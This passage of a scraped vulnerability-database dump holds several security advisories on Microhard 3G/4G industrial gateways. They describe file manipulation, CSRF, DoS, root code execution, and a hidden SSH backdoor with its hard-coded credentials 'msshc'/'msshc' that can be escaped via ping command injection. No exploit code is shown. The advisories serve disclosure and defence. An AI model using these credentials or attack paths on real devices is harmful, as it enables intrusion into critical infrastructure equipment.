\nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_config.txt](<../../codes/microhard_config.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45036/> \n[2] <https://packetstormsecurity.com/files/148573> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146623> \n[4] <https://cxsecurity.com/issue/WLB-2018070164>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5484", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_config.txt"}, {"lastseen": "2019-11-11T16:11:50", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks \nAdvisory ID: [ZSL-2018-5485](<ZSL-2018-5485.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Privilege Escalation, Exposure of Sensitive Information, DoS, Security Bypass, Manipulation of Data \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nDue to the hidden and undocumented File Editor (Filesystem Browser) shell script 'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET and POST parameters is not properly sanitized before being used to modify files. This can be exploited by an authenticated attacker to read or modify arbitrary files on the affected system. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_fd.txt](<../../codes/microhard_fd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2018070165> \n[2] <https://packetstormsecurity.com/files/148574> \n[3] <https://www.exploit-db.com/exploits/45037/> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146626>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5485", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_fd.txt"}, {"lastseen": "2019-11-11T16:11:43", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities \nAdvisory ID: [ZSL-2018-5478](<ZSL-2018-5478.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_csrf.txt](<../../codes/microhard_csrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45034/> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146624> \n[3] <https://cxsecurity.com/issue/WLB-2018070168> \n[4] <https://packetstormsecurity.com/files/148562>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5478", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_csrf.txt"}, {"lastseen": "2019-11-11T16:11:26", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS \nAdvisory ID: [ZSL-2018-5481](<ZSL-2018-5481.php>) \nType: Local/Remote \nImpact: DoS \nRisk: (4/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThere is an undocumented and hidden feature that allows an authenticated attacker to list running processes in the operating system and send arbitrary signals to kill any process running in the background including starting and stopping system services. This impacts availability and can be triggered also by CSRF attacks that requires device restart and/or factory reset to rollback malicious changes. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_dos.txt](<../../codes/microhard_dos.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45035/> \n[2] <https://packetstormsecurity.com/files/148568> \n[3] <https://cxsecurity.com/issue/WLB-2018070163> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146625>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5481", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_dos.txt"}, {"lastseen": "2019-11-11T16:11:33", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit \nAdvisory ID: [ZSL-2018-5479](<ZSL-2018-5479.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe application suffers from multiple authenticated arbitrary remote code execution vulnerabilities with highest privileges. This is due to multiple hidden and undocumented features within the admin interface that allows an attacker to create crontab jobs and/or modify the system startup script that allows execution of arbitrary code as root user. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_rce.txt](<../../codes/microhard_rce.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45038/> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146620> \n[3] [https://packetstormsecurity.com/files/148563 \n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2] and [3] \n\n##### Contact\n\nZero Science Lab \n \nWeb: ](<https://packetstormsecurity.com/files/148563>)<http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5479", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_rce.txt"}, {"lastseen": "2019-11-11T16:11:42", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak \nAdvisory ID: [ZSL-2018-5486](<ZSL-2018-5486.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe web shell application includes a service called Microhard Sh that is documented only as 'reserved for internal use'. This service can be enabled by an authenticated user within the Services menu in the web admin panel. This can also be enabled via CSRF attack. When the service is enabled, a user 'msshc' is created on the system with password 'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP jailed environment, that has limited commands for file transfer administration. One of the commands is a custom added 'ping' command that has a command injection vulnerability that allows the attacker to escape the restricted environment and enter into a root shell terminal that can execute commands as the root user. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_backdoor.txt](<../../codes/microhard_backdoor.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45041/> \n[2] <https://cxsecurity.com/issue/WLB-2018070171> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146619> \n[4] <https://packetstormsecurity.com/files/148575>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5486", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_backdoor.txt"}, {"lastseen": "2019-11-11T16:11:09", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials \nAdvisory ID: [ZSL-2018-5480](<ZSL-2018-5480.php>) \nType: Local/Remote \nImpact: System Access \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe 